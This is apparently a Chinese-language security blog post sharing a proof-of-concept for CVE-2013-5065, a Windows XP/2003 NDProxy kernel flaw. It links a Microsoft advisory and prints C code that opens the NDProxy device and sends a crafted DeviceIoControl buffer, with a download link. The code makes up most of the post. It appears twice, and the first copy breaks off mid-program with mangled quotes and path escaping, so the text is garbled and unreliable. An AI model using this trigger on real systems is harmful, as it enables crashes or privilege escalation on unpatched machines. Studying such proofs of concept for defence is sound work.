CVE-2013-5065 PoC

  • A+
所属分类:漏洞时代
摘要

这个是有07大牛带出来的poc
微软安全公告: http://technet.microsoft.com/zh-cn/security/advisory/2914486
受影响系统: XP, 2003
PoC:
[php]
#include
#include
int main()
{
HANDLE hDev = CreateFile(“////.//NDProxy”, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDev==INVALID_HANDLE_VALUE)
{
printf(“CreateFile Error:%d/n”,GetLastError());
}
DWORD InBuf[0x15] = {0};
DWORD dwRetBytes = 0;
*(InBuf+5) = 0x7030125;
*(InBuf+7) = 0x34;

这个是有07大牛带出来的poc
微软安全公告: http://technet.microsoft.com/zh-cn/security/advisory/2914486
受影响系统: XP, 2003
PoC:
[php]
#include
#include
int main()
{
HANDLE hDev = CreateFile("////.//NDProxy", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDev==INVALID_HANDLE_VALUE)
{
printf("CreateFile Error:%d/n",GetLastError());
}
DWORD InBuf[0x15] = {0};
DWORD dwRetBytes = 0;
*(InBuf+5) = 0x7030125;
*(InBuf+7) = 0x34;

DeviceIoControl(hDev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, &dwRetBytes, 0);
CloseHandle(hDev);

return 0;
}[/php]
CVE-2013-5065 PoC
华丽丽的表示鸡肋了,一般谁会开启这个服务啊

下载地址:点我下载

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: